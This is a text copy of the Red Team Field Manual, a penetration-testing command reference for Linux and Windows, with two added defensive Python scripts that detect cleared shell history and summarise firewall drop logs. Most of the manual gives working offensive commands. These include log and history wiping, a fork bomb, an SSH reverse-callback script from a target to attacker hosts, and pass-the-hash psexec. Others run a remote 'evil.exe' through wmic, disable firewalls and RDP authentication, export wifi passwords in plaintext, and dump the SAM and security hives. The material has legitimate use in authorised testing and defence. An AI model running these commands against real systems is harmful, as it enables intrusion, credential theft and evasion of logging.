RTFM


RED TEAM FIELD MANUAL


BEN CLARK


v1.0


RTFM. Copyright © 2013 by Ben Clark


All rights reserved. No part of this work may be reproduced or transmitted
in any form or by any means, without prior written permission of the
copyright owner.


ISBN-10: 1494295504
ISBN-13: 978-1494295509


Technical Editor: Joe Vest 
Graphic: Joe Vest 


Product and company names mentioned herein may be the trademarks of their 
respective owners. Rather than use a trademark symbol with every occurrence 
of a trademarked name, the author uses the names only in an editorial 
fashion, with no intention of infringement of the trademark. Use of a term 
in this book should not be regarded as affecting the validity of any 
trademark or service mark. 


The information in this book is distributed "as is". While every precaution
was taken to ensure the accuracy of the material, the author assumes no
responsibility or liability for errors or omissions, or for damages
resulting from the use of the information contained herein.


TABLE OF CONTENTS


*NIX .................. 4
WINDOWS ............... 14
NETWORKING ............ 34
TIPS AND TRICKS ....... 42
TOOL SYNTAX ........... 50
WEB ................... 66
DATABASES ............. 72
PROGRAMMING ........... 76
WIRELESS .............. 84
REFERENCES ............ 94
INDEX ................. 95


This Bonus Material added by OE800


Nmap Cheat Sheet
Nmap Cheat Sheet 2
Wireshark Display Filters
Common Ports List
Google Cheat Sheet
Scapy
TCPDUMP
NAT
QoS
IPv4
IPv6


*NIX


LINUX NETWORK COMMANDS


watch ss -tp                                   Network connections
netstat -ant|-tulpn                            Tcp connections -anu=udp
netstat -tulpn                                 Connections with PIDs
lsof -i                                        Established connections
smb://ip/share                                 Access windows smb share
share user x.x.x.x c$                          Mount Windows share
smbclient -U user \\\\ip\\share                SMB connect
ifconfig eth# ip/cidr                          Set IP and netmask
ifconfig eth0:1 ip/cidr                        Set virtual interface
route add default gw gw_ip                     Set GW
ifconfig eth# mtu [size]                       Change MTU size
export MAC=xx:XX:XX:XX:XX:XX                   Change MAC
ifconfig int hw ether MAC                      Change MAC
macchanger -m MAC int                          Backtrack MAC changer
iwlist int scan                                Built-in wifi scanner
dig -x ip                                      Domain lookup for IP
host ip                                        Domain lookup for IP
host -t SRV _service._tcp.url.com              Domain SRV lookup
dig @ip domain -t AXFR                         DNS Zone Xfer
host -l domain namesvr                         DNS Zone Xfer
ip xfrm state list                             Print existing VPN keys
ip addr add ip/cidr dev eth0                   Adds "hidden" interface
cat /var/log/messages | grep DHCP              List DHCP assignments
tcpkill host ip and port port                  Block ip:port
echo "1" > /proc/sys/net/ipv4/ip_forward       Turn on IP Forwarding
echo "nameserver x.x.x.x" > /etc/resolv.conf   Add DNS Server


LINUX SYSTEM INFO


nbtstat -A ip                                  Get hostname for ip
id                                             Current username
w                                              Logged on users
who -a                                         User information
last -a                                        Last users logged on
ps -ef                                         Process listing (top)
df -h                                          Disk usage (free)
uname -a                                       Kernel version/CPU info
mount                                          Mounted file systems
getent passwd                                  Show list of users
PATH=$PATH:/home/mypath                        Add to PATH variable
kill pid                                       Kills process with pid
cat /etc/issue                                 Show OS info
cat /etc/*release*                             Show OS version info
cat /proc/version                              Show kernel info
rpm --query --all                              Installed pkgs (Redhat)
rpm -ivh *.rpm                                 Install RPM (-e=remove)
dpkg --get-selections                          Installed pkgs (Ubuntu)
dpkg -i *.deb                                  Install DEB (-r=remove)
pkginfo                                        Installed pkgs (Solaris)
which tscsh/csh/ksh/bash                       Show location of executable
chmod 750 tcsh/csh/ksh                         Disable shell, force bash

LINUX UTILITY COMMANDS


wget http://url -O url.txt -o /dev/null        Grab url
rdesktop ip                                    Remote Desktop to ip
scp /tmp/file user@x.x.x.x:/tmp/file           Put file
scp user@remoteip:/tmp/file /tmp/file          Get file
useradd -m user                                Add user
passwd user                                    Change user password
rmuser uname                                   Remove user
script -a outfile                              Record shell : Ctrl-D stops
apropos subject                                Find related command
history                                        View users command history
!num                                           Executes line # in history


LINUX FILE COMMANDS


diff file1 file2                               Compare files
rm -rf dir                                     Force delete of dir
shred -f -u file                               Overwrite/delete file
touch -r ref_file file                         Matches ref_file timestamp
touch -t YYYYMMDDhhmm file                     Set file timestamp
sudo fdisk -l                                  List connected drives
mount /dev/sda# /mnt/usbkey                    Mount USB key
md5sum -t file                                 Compute md5 hash
echo -n "str" | md5sum                         Generate md5 hash
sha1sum file                                   SHA1 hash of file
sort -u                                        Sort/show unique lines
grep -c "str" file                             Count lines w/ "str"
tar cf file.tar files                          Create .tar from files
tar xf file.tar                                Extract .tar
tar czf file.tar.gz files                      Create .tar.gz
tar xzf file.tar.gz                            Extract .tar.gz
tar cjf file.tar.bz2 files                     Create .tar.bz2
tar xjf file.tar.bz2                           Extract .tar.bz2
gzip file                                      Compress/rename file
gzip -d file.gz                                Decompress file.gz
upx -9 -o out.exe orig.exe                     UPX packs orig.exe
zip -r zipname.zip directory/                  Create zip
dd skip=1000 count=2000 bs=8 if=file of=file   Cut block 1K-3K from file
split -b 9k file prefix                        Split file into 9K chunks
awk 'sub("$", "\r")' unix.txt > win.txt        Win compatible txt file
find / -iname "*.pdf"                          Find PDF files
find / -perm -4000 -o -perm -2000 -exec ls -ldb {} \;
                                               Search for setuid files
dos2unix file                                  Convert to 'nix format
file file                                      Determine file type/info
chattr (+/-)i file                             Set/Unset immutable bit


LINUX MISC COMMANDS


unset HISTFILE                                 Disable history logging
ssh user@ip arecord - | aplay -                Record remote mic
gcc -o outfile myfile.c                        Compile C,C++
init 6                                         Reboot (0 = shutdown)
cat /etc/*syslog*.conf | grep -v "^#"          List of log files
grep 'href=' file | cut -d"/" -f3 | grep url | sort -u
                                               Strip links from url.com
dd if=/dev/urandom of=file bs=3145728 count=1  Make random 3MB file


LINUX "COVER YOUR TRACKS" COMMANDS


echo "" > /var/log/auth.log                    Clear auth.log file
echo "" > ~/.bash_history                      Clear current user bash history
rm ~/.bash_history -rf                         Delete .bash_history file
history -c                                     Clear current session history
export HISTFILESIZE=0                          Set history max lines to 0
export HISTSIZE=0                              Set history max commands to 0
unset HISTFILE                                 Disable history logging (need to
                                               logout to take effect)
kill -9 $$                                     Kills current session
ln /dev/null ~/.bash_history -sf               Permanently send all bash history
                                               commands to /dev/null
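The table above lists the commands used to hide shell history; the checks a defender runs for those traces are the mirror image. The following Python script is an added example (not from the book): it scans a home directory for a .bash_history that is empty, missing or symlinked to /dev/null, for shell start-up files that unset HISTFILE or zero HISTSIZE/HISTFILESIZE, and flags a log file that has been truncated to nothing. The indicator names and the constructed temporary home directory built in demo() are this example's own.

```python
#!/usr/bin/env python3
"""Check a home directory and a log file for traces of the history-hiding
commands listed above. Added example for this page, not from the book;
the indicator names are this script's own."""
import os
import re
import tempfile
from pathlib import Path

# Lines in shell start-up files that correspond to the table's commands.
HISTORY_PATTERNS = {
    "HISTFILE unset": re.compile(r"^\s*unset\s+HISTFILE\b"),
    "HISTSIZE zeroed": re.compile(r"^\s*(export\s+)?HISTSIZE=0\b"),
    "HISTFILESIZE zeroed": re.compile(r"^\s*(export\s+)?HISTFILESIZE=0\b"),
}
RC_FILES = (".bashrc", ".bash_profile", ".profile")


def history_indicators(home):
    """Return a sorted list of indicator names found under `home`."""
    home = Path(home)
    found = set()
    hist = home / ".bash_history"
    if hist.is_symlink():
        # "ln /dev/null ~/.bash_history -sf" leaves a symlink to /dev/null
        if os.path.realpath(hist) == "/dev/null":
            found.add(".bash_history -> /dev/null")
        else:
            found.add(".bash_history is a symlink")
    elif not hist.exists():
        found.add(".bash_history missing")
    elif hist.stat().st_size <= 1:
        # echo "" > ~/.bash_history leaves a single newline behind
        found.add(".bash_history empty")
    for name in RC_FILES:
        rc = home / name
        if not rc.is_file():
            continue
        for line in rc.read_text(errors="replace").splitlines():
            for label, pattern in HISTORY_PATTERNS.items():
                if pattern.search(line):
                    found.add(f"{label} in {name}")
    return sorted(found)


def log_truncated(path):
    """True when the log exists but holds at most a newline (echo "" > log)."""
    p = Path(path)
    return p.exists() and p.stat().st_size <= 1


def demo():
    """Build a constructed home directory showing several indicators and scan it."""
    root = Path(tempfile.mkdtemp(prefix="histcheck-"))
    home = root / "home"
    home.mkdir()
    (home / ".bash_history").symlink_to("/dev/null")
    (home / ".bashrc").write_text("export HISTSIZE=0\nunset HISTFILE\n")
    (root / "auth.log").write_text("\n")
    return history_indicators(home), log_truncated(root / "auth.log")


if __name__ == "__main__":
    hits, empty_log = demo()
    for hit in hits:
        print("INDICATOR:", hit)
    print("auth.log truncated:", empty_log)
```

On a real host, point history_indicators() at each directory under /home (and /root) and log_truncated() at the logs in /var/log; an empty auth.log on a machine that has been up for days is worth a second look on its own.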


LINUX FILE SYSTEM STRUCTURE


/bin                                           User binaries
/boot                                          Boot-up related files
/dev                                           Interface for system devices
/etc                                           System configuration files
/home                                          Base directory for user files
/lib                                           Critical software libraries
/opt                                           Third party software
/proc                                          System and running programs
/root                                          Home directory of root user
/sbin                                          System administrator binaries
/tmp                                           Temporary files
/usr                                           Less critical files
/var                                           Variable system files


LINUX FILES


/etc/shadow                                    Local users' hashes
/etc/passwd                                    Local users
/etc/group                                     Local groups
/etc/rc.d                                      Startup services
/etc/init.d                                    Service
/etc/hosts                                     Known hostnames and IPs
/etc/HOSTNAME                                  Full hostname with domain
/etc/network/interfaces                        Network configuration
/etc/profile                                   System environment variables
/etc/apt/sources.list                          Ubuntu sources list
/etc/resolv.conf                               Nameserver configuration
/home/user/.bash_history                       Bash history (also /root/)
/usr/share/wireshark/manuf                     Vendor-MAC lookup
~/.ssh/                                        SSH keystore
/var/log                                       System log files (most Linux)
/var/adm                                       System log files (Unix)
/var/spool/cron                                List cron files
/var/log/apache/access.log                     Apache connection log
/etc/fstab                                     Static file system info


LINUX SCRIPTING


PING SWEEP


for x in {1..254..1};do ping -c 1 1.1.1.$x | grep "64 bytes" | cut -d" " -f4 >> ips.txt; done


AUTOMATED DOMAIN NAME RESOLVE BASH SCRIPT


#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1..254..1};do
    host $range.$ip |grep "name pointer" |cut -d" " -f5
done


FORK BOMB (CREATES PROCESSES UNTIL SYSTEM "CRASHES")


:(){ :|:& };:


DNS REVERSE LOOKUP


for ip in {1..254..1}; do dig -x 1.1.1.$ip | grep $ip >> dns.txt; done;


IP BANNING SCRIPT


#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while [ $i -le 253 ]
do
    if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
        echo "BANNED: arp -s 192.168.1.$i"
        arp -s 192.168.1.$i 00:00:00:00:00:0a
    else
        echo "IP NOT BANNED: 192.168.1.$i"
        echo "*******************************"
    fi
    i=`expr $i + 1`
done


SSH CALLBACK


Set up script in crontab to callback every X minutes. Highly recommend you
set up a generic user on red team computer (with no shell privs). Script
will use the private key (located on callback source computer) to connect
to a public key (on red team computer). Red teamer connects to target via a
local SSH session (in the example below, use #ssh -p4040 localhost)


#!/bin/sh
# Callback script located on callback source computer (target)
killall ssh >/dev/null 2>&1
sleep 5
REMLIS=4040
REMUSR=user
HOSTS="domain1.com domain2.com domain3.com"
for LIVEHOST in $HOSTS;
do
    # number of replies received from a 2-packet ping
    COUNT=$(ping -c2 $LIVEHOST | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
    if [ $COUNT -gt 0 ]; then
        ssh -R ${REMLIS}:localhost:22 -i "/home/${REMUSR}/.ssh/id_rsa" -N $LIVEHOST -l ${REMUSR}
    fi
done


IPTABLES


* Use ip6tables for IPv6 rules


iptables-save -c > file                        Dump iptables (with counters) rules to stdout
iptables-restore file                          Restore iptables rules
iptables -L -v --line-numbers                  List all iptables rules with packet counts and line numbers
iptables -F                                    Flush all iptables rules
iptables -P INPUT/FORWARD/OUTPUT ACCEPT/REJECT/DROP
                                               Change default policy for rules that don't match rules
iptables -A INPUT -i interface -m state --state RELATED,ESTABLISHED -j ACCEPT
                                               Allow established connections on INPUT
iptables -D INPUT 7                            Delete 7th inbound rule
iptables -t raw -L -n                          Increase throughput by turning off statefulness
iptables -P INPUT DROP                         Drop all packets


ALLOW SSH ON PORT 22 OUTBOUND


iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i iface -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT


ALLOW ICMP OUTBOUND


# OUTPUT rules match the outgoing interface (-o) and INPUT rules the
# incoming one (-i); iptables rejects -i on OUTPUT and -o on INPUT
iptables -A OUTPUT -o iface -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -i iface -p icmp --icmp-type echo-reply -j ACCEPT


PORT FORWARD


echo "1" > /proc/sys/net/ipv4/ip_forward
# OR - sysctl net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp -i eth0 -j DNAT -d pivotip --dport 443 --to-destination attackip:443
# POSTROUTING only matches on the outgoing interface (-o)
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT -s target_subnet(CIDR) -d attackip --dport 443 --to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT


ALLOW ONLY 1.1.1.0/24, PORTS 80,443 AND LOG DROPS TO /VAR/LOG/MESSAGES


iptables -A INPUT -s 1.1.1.0/24 -m state --state RELATED,ESTABLISHED,NEW -p tcp -m multiport --dports 80,443 -j ACCEPT
iptables -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o eth0 -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP
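The LOGGING chain above writes one kernel message per dropped packet, tagged with the prefix "DROPPED ". The following Python script is an added example (not from the book) that parses those messages out of a syslog-style file and counts drops per source address and per protocol/destination port, which is the first thing to look at when reviewing what the firewall is rejecting. The lines in SAMPLE_LOG are constructed for the example; the field layout follows the kernel LOG target's output (IN=, OUT=, SRC=, DST=, PROTO=, DPT=).

```python
#!/usr/bin/env python3
"""Summarise the "DROPPED " entries the LOGGING chain above writes to
/var/log/messages: drops per source address and per protocol/port.
Added example, not from the book; the log lines below are constructed."""
import re
from collections import Counter

LOG_PREFIX = "DROPPED "          # same value as --log-prefix in the rule above
KV = re.compile(r"\b([A-Z]+)=(\S*)")   # KEY=value tokens of the LOG target

# Constructed sample: three TCP drops, one ICMP drop and one unrelated line.
SAMPLE_LOG = """\
Jun  3 10:15:02 gw kernel: [1201.112] DROPPED IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=1.1.1.10 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=TCP SPT=51234 DPT=23 WINDOW=29200 RES=0x00 SYN URGP=0
Jun  3 10:15:03 gw kernel: [1202.004] DROPPED IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=1.1.1.10 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=TCP SPT=51235 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0
Jun  3 10:15:03 gw kernel: [1202.731] DROPPED IN=eth0 OUT= MAC=00:11:22:33:44:55:cc:dd:ee:ff:00:11:08:00 SRC=198.51.100.7 DST=1.1.1.10 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=54321 PROTO=TCP SPT=6000 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Jun  3 10:15:04 gw sshd[4242]: Accepted publickey for ops from 1.1.1.20 port 50022 ssh2
Jun  3 10:15:05 gw kernel: [1204.010] DROPPED IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=1.1.1.10 LEN=84 TOS=0x00 PREC=0x00 TTL=54 ID=1 PROTO=ICMP TYPE=8 CODE=0 ID=777 SEQ=1
"""


def parse_drop(line):
    """Return the KEY=value fields of a DROPPED line, or None for any other line."""
    if LOG_PREFIX not in line or "kernel:" not in line:
        return None
    return dict(KV.findall(line.split(LOG_PREFIX, 1)[1]))


def summarise(log_text):
    """Count drops per SRC and per PROTO/DPT (PROTO alone when there is no port)."""
    by_src = Counter()
    by_dst = Counter()
    for line in log_text.splitlines():
        fields = parse_drop(line)
        if fields is None:
            continue
        by_src[fields.get("SRC", "?")] += 1
        proto = fields.get("PROTO", "?")
        by_dst[f"{proto}/{fields['DPT']}" if "DPT" in fields else proto] += 1
    return by_src, by_dst


if __name__ == "__main__":
    src, dst = summarise(SAMPLE_LOG)
    for ip, n in src.most_common():
        print(f"{n:4d} drops from {ip}")
    for key, n in dst.most_common():
        print(f"{n:4d} drops to {key}")
```

Because the rule uses -m limit --limit 4/min, the counts are a sample of the dropped traffic, not a total; the limit exists so a flood cannot fill the disk with log lines.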
UPDATE-RC.D


Check/change startup services


service --status-all                           List all services w/ status
service service start                          Start a service
service service stop                           Stop a service
service service status                         Check status of a service
update-rc.d -f service remove                  Remove a service start up cmd (if the
                                               /etc/init.d start up file exists)
update-rc.d service defaults                   Add a start up service


CHKCONFIG (RHEL), (OEL)


* Available in Linux distributions such as Red Hat Enterprise Linux,
CentOS and Oracle Enterprise Linux


chkconfig --list                               List existing services and run status
chkconfig service --list                       Check single service status
chkconfig service on [--level 3]               Add service (service starts at boot)
                                               [optional to add level at which service runs]
chkconfig service off [--level 3]              Remove service (service does not start)
e.g. chkconfig iptables off


SCREEN
(C-a == Control-a)


screen -S name                                 Start new screen with name
screen -ls                                     List running screens
screen -r name                                 Attach to screen name
screen -S name -X cmd                          Send cmd to screen
C-a ?                                          List keybindings (help)
C-a d                                          Detach
C-a D D                                        Detach and logout
C-a c                                          Create new window
C-a C-a                                        Switch to last active window
C-a ' num|name                                 Switch to window num|name
C-a "                                          See windows list and change
C-a k                                          Kill current window
C-a S                                          Split display horizontally
C-a |                                          Split display vertically
C-a tab                                        Jump to next display
C-a X                                          Remove current region
C-a Q                                          Remove all regions but current


X11


CAPTURE REMOTE X11 WINDOWS AND CONVERT TO JPG


xwd -display ip:0 -root -out /tmp/test.xpm
xwud -in /tmp/test.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg


OPEN X11 STREAM VIEWING


xwd -display 1.1.1.1:0 -root -silent -out x11dump
Read dumped file with xwudtopnm or GIMP


TCPDUMP


CAPTURE PACKETS ON ETH0 IN ASCII AND HEX AND WRITE TO FILE


tcpdump -i eth0 -XX -w out.pcap


CAPTURE HTTP TRAFFIC TO 2.2.2.2


tcpdump -i eth0 port 80 and dst 2.2.2.2


SHOW CONNECTIONS TO A SPECIFIC IP


tcpdump -i eth0 -tttt dst 192.168.1.22 and not net 192.168.1.0/24


PRINT ALL PING RESPONSES


tcpdump -i eth0 'icmp[icmptype] == icmp-echoreply'


CAPTURE 50 DNS PACKETS AND PRINT TIMESTAMP


tcpdump -i eth0 -c 50 -tttt 'udp and port 53'


NATIVE KALI COMMANDS


WMIC EQUIVALENT


wmis -U DOMAIN\user%password //DC cmd.exe /c command


MOUNT SMB SHARE


# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs //ip/share /mnt/share -o user=user,pass=pass,sec=ntlmssp,domain=domain,rw


UPDATING KALI


apt-get update
apt-get upgrade


PFSENSE


pfSsh.php                                      pfSense Shell System
pfSsh.php playback enableallowallwan           Allow all inbound WAN connections
                                               (adds to visible rules in WAN rules)
pfSsh.php playback enablesshd                  Enable ssh inbound/outbound
pfctl -sn                                      Show NAT rules
pfctl -sr                                      Show filter rules
pfctl -sa                                      Show all rules
viconfig                                       Edit config
rm /tmp/config.cache                           Remove cached (backup) config after
                                               editing the current running
/etc/rc.reload_all                             Reload entire config


SOLARIS


ifconfig -a                                    List of interfaces
netstat -in                                    List of interfaces
netstat -rn                                    Route listing
ifconfig eth0 dhcp                             Start DHCP Client
ifconfig eth0 plumb up ip netmask nmask        Set IP
route add default ip                           Set gateway
logins -p                                      List users w/out passwords
svcs -a                                        List all services w/ status
prstat -a                                      Process listing (top)
svcadm start ssh                               Start SSH service
inetadm -e telnet (-d for disable)             Enable telnet
prtconf | grep Memory                          Total physical memory
iostat -En                                     Hard disk size
showrev -c /usr/bin/bash                       Information on a binary
shutdown -i6 -g0 -y                            Restart system
dfmounts                                       List clients connected NFS
smc                                            Management GUI
snoop -d int -c pkt# -o results.pcap           Packet capture
/etc/vfstab                                    File system mount table
/var/adm/logging                               Login attempt log
/etc/default/*                                 Default settings
/etc/system                                    Kernel modules & config
/var/adm/messages                              Syslog location
/etc/auto_*                                    Automounter config files
/etc/inet/ipnodes                              IPv4/IPv6 host file


WINDOWS


WINDOWS VERSIONS


NT 3.1    Windows NT 3.1 (All)
NT 3.5    Windows NT 3.5 (All)
NT 3.51   Windows NT 3.51 (All)
NT 4.0    Windows NT 4.0 (All)
NT 5.0    Windows 2000 (All)
NT 5.1    Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
NT 5.2    Windows XP (64-bit, Pro 64-bit)
          Windows Server 2003 & R2 (Standard, Enterprise)
          Windows Home Server
NT 6.0    Windows Vista (Starter, Home, Basic, Home Premium, Business,
          Enterprise, Ultimate)
          Windows Server 2008 (Foundation, Standard, Enterprise)
NT 6.1    Windows 7 (Starter, Home, Pro, Enterprise, Ultimate)
          Windows Server 2008 R2 (Foundation, Standard, Enterprise)
NT 6.2    Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM))
          Windows Phone 8
          Windows Server 2012 (Foundation, Essentials, Standard)


WINDOWS FILES


%SYSTEMROOT%                                   Typically C:\Windows
%SYSTEMROOT%\System32\drivers\etc\hosts        DNS entries
%SYSTEMROOT%\System32\drivers\etc\networks     Network settings
%SYSTEMROOT%\system32\config\SAM               User & password hashes
%SYSTEMROOT%\repair\SAM                        Backup copy of SAM
%SYSTEMROOT%\System32\config\RegBack\SAM       Backup copy of SAM
%WINDIR%\system32\config\AppEvent.Evt          Application Log
%WINDIR%\system32\config\SecEvent.Evt          Security Log
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\ Startup Location
%USERPROFILE%\Start Menu\Programs\Startup\     Startup Location
%SYSTEMROOT%\Prefetch                          Prefetch dir (EXE logs)


STARTUP DIRECTORIES


WINDOWS NT 6.1, 6.0


# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup


# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


WINDOWS NT 5.2, 5.1, 5.0


%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup


WINDOWS 9x


%SystemDrive%\WINDOWS\Start Menu\Programs\Startup


WINDOWS NT 4.0, 3.51, 3.50


%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
WINDOWS SYSTEM INFO COMMANDS


ver                                            Get OS version
sc query state=all                             Show services
tasklist /svc                                  Show processes & services
tasklist /m                                    Show all processes & DLLs
tasklist /S ip /v                              Remote process listing
taskkill /PID pid /F                           Force process to terminate
systeminfo /S ip /U domain\user /P Pwd         Remote system info
reg query \\ip\RegDomain\Key /v Value          Query remote registry, /s=all values
reg query HKLM /f password /t REG_SZ /s        Search registry for password
fsutil fsinfo drives                           List drives *must be admin
dir /a /s /b c:\*.pdf*                         Search for all PDFs
dir /a /b c:\windows\kb*                       Search for patches
findstr /si password *.txt *.xml *.xls         Search files for password
tree /F /A c:\ > tree.txt                      Directory listing of C:
reg save HKLM\Security security.hive           Save security hive to file
echo %USERNAME%                                Current user


WINDOWS NET/DOMAIN COMMANDS


net view /domain                               Hosts in current domain
net view /domain:[MYDOMAIN]                    Hosts in [MYDOMAIN]
net user /domain                               All users in current domain
net user user pass /add                        Add user
net localgroup "Administrators" user /add      Add user to Administrators
net accounts /domain                           Domain password policy
net localgroup "Administrators"                List local Admins
net group /domain                              List domain groups
net group "Domain Admins" /domain              List users in Domain Admins
net group "Domain Controllers" /domain         List DCs for current domain
net share                                      Current SMB shares
net session | find / "\\"                      Active SMB sessions
net user user /ACTIVE:yes /domain              Unlock domain user account
net user user "newpassword" /domain            Change domain user password
net share share c:\share /GRANT:Everyone,FULL  Share folder


WINDOWS REMOTE COMMANDS


tasklist /S ip /v                              Remote process listing
systeminfo /S ip /U domain\user /P Pwd         Remote systeminfo
net share \\ip                                 Shares of remote computer
net use \\ip                                   Remote filesystem (IPC$)
net use z: \\ip\share password /user:DOMAIN\user
                                               Map drive, specified credentials
reg add \\ip\regkey\value                      Add registry key remotely
sc \\ip create service binpath=C:\Windows\System32\x.exe start= auto
                                               Create a remote service (space after start=)
xcopy /s \\ip\dir C:\local                     Copy remote folder
shutdown /m \\ip /r /t 0 /f                    Remotely reboot machine
WINDOWS NETWORK COMMANDS


ipconfig /all                                  IP configuration
ipconfig /displaydns                           Local DNS cache
netstat -ano                                   Open connections
netstat -anop tcp 1                            Netstat loop
netstat -an | findstr LISTENING                LISTENING ports
route print                                    Routing table
arp -a                                         Known MACs (ARP table)
nslookup, set type=any, ls -d domain > results.txt, exit
                                               DNS Zone Xfer
nslookup -type=SRV _www._tcp.url.com           Domain SRV lookup (_ldap, _kerberos, _sip)
tftp -I ip GET remotefile                      TFTP file transfer
netsh wlan show profiles                       Saved wireless profiles
netsh firewall set opmode disable              Disable firewall (*Old)
netsh wlan export profile folder=. key=clear   Export wifi plaintext pwd
netsh interface ip show interfaces             List interface IDs/MTUs
netsh interface ip set address local static ip nmask gw ID
                                               Set IP
netsh interface ip set dns local static ip     Set DNS server
netsh interface ip set address local dhcp      Set interface to use DHCP


WINDOWS UTILITY COMMANDS


type file                                      Display file contents
del path\*.* /a /s /q /f                       Forceably delete all files in path
find /I "str" filename                         Find "str"
command | find /c /v ""                        Line count of cmd output
at HH:MM file [args] (i.e. at 14:45 cmd /c)    Schedule file to run
runas /user:user "file [args]"                 Run file as user
shutdown /r /t 0                               Restart now
tr -d '\15\32' < win.txt > unix.txt            Removes CR & ^Z (*nix)
makecab file                                   Native compression
Wusa.exe /uninstall /kb:###                    Uninstall patch
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true"
                                               CLI Event Viewer
lusrmgr.msc                                    Local user manager
services.msc                                   Services control panel
taskmgr.exe                                    Task manager
secpol.msc                                     Security policy manager
eventvwr.msc                                   Event viewer


MISC. COMMANDS


LOCK WORKSTATION


rundll32.exe user32.dll,LockWorkStation


DISABLE WINDOWS FIREWALL


netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off


NATIVE WINDOWS PORT FORWARD (* MUST BE ADMIN)


netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2


#Remove
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1


RE-ENABLE COMMAND PROMPT


reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f


PSEXEC


EXECUTE FILE HOSTED ON REMOTE SYSTEM WITH SPECIFIED CREDENTIALS


psexec /accepteula \\targetIP -u domain\user -p password -c -f \\smbIP\share\file.exe


RUN REMOTE COMMAND WITH SPECIFIED HASH


psexec /accepteula \\ip -u Domain\user -p LM:NTLM cmd.exe /c dir c:\Progra~1


RUN REMOTE COMMAND AS SYSTEM


psexec /accepteula \\ip -s cmd.exe
TERMINAL SERVICES (RDP)


START RDP


1. Create regfile.reg file with following lines in it:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

2. reg import regfile.reg
3. net start "termservice"
4. sc config termservice start= auto
5. net start termservice


--OR--


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


TUNNEL RDP OUT PORT 443 (MAY NEED TO RESTART TERMINAL SERVICES)


REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f


DISABLE NETWORK LEVEL AUTHENTICATION, ADD FIREWALL EXCEPTION


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable


IMPORT A SCHEDULE TASK FROM AN "EXPORTED TASK" XML


schtasks.exe /create /tn MyTask /xml "C:\MyTask.xml" /f
WMIC


wmic [alias] get /?                            List all attributes
wmic [alias] call /?                           Callable methods
wmic process list full                         Process attributes
wmic startup
wmic service                                   Starts wmic service
wmic ntdomain list                             Domain and DC info
wmic qfe                                       List all patches
wmic process call create "process_name"        Execute process
wmic process where name="process" call terminate
                                               Terminate process
wmic logicaldisk get description,name          View logical shares
wmic cpu get DataWidth /format:list            Display 32 || 64 bit


WMIC [ALIAS] [WHERE] [CLAUSE]


[alias] == process, share, startup, service, nicconfig, useraccount, etc.
[where] == where (name="cmd.exe"), where (parentprocessid!=[pid]), etc.
[clause] == list [full|brief], get [attrib1, attrib2], call [method], delete


EXECUTE FILE HOSTED OVER SMB ON REMOTE SYSTEM WITH SPECIFIED CREDENTIALS


wmic /node:targetIP /user:domain\user /password:password process call create "\\smbIP\share\evil.exe"


UNINSTALL SOFTWARE


wmic product get name /value    # Get software names
wmic product where name="XXX" call uninstall /nointeractive


REMOTELY DETERMINE LOGGED IN USER


wmic /node:remotecomputer computersystem get username


REMOTE PROCESS LISTING EVERY SECOND


wmic /node:machinename process list brief /every:1


REMOTELY START RDP


wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"


LIST NUMBER OF TIMES USER HAS LOGGED ON


wmic netlogin where (name like "%adm%") get numberoflogons


